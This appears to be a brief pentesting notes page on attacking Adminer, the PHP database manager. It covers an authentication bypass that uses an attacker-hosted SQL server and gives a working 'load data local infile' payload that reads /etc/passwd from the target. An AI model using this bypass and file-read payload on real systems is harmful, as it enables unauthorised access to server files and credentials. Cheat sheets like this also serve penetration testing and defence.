adminer.php

/adminer.php

Interesting Paths

/var/www/html/index.php

Auth Bypass and LFI

Host own SQL server, connect via target to bypass login

link1| link2

Check PHPinfo
open_basedir /var/www/html => can only read files in this dir.

# LFI via SQL

load data local infile "/etc/passwd"
into table admirer.pwn
fields terminated by "\n";

PreviousadminLTE Nextcomment system

Last updated 3 years ago

Was this helpful?

Login Page

Interesting Paths

Auth Bypass and LFI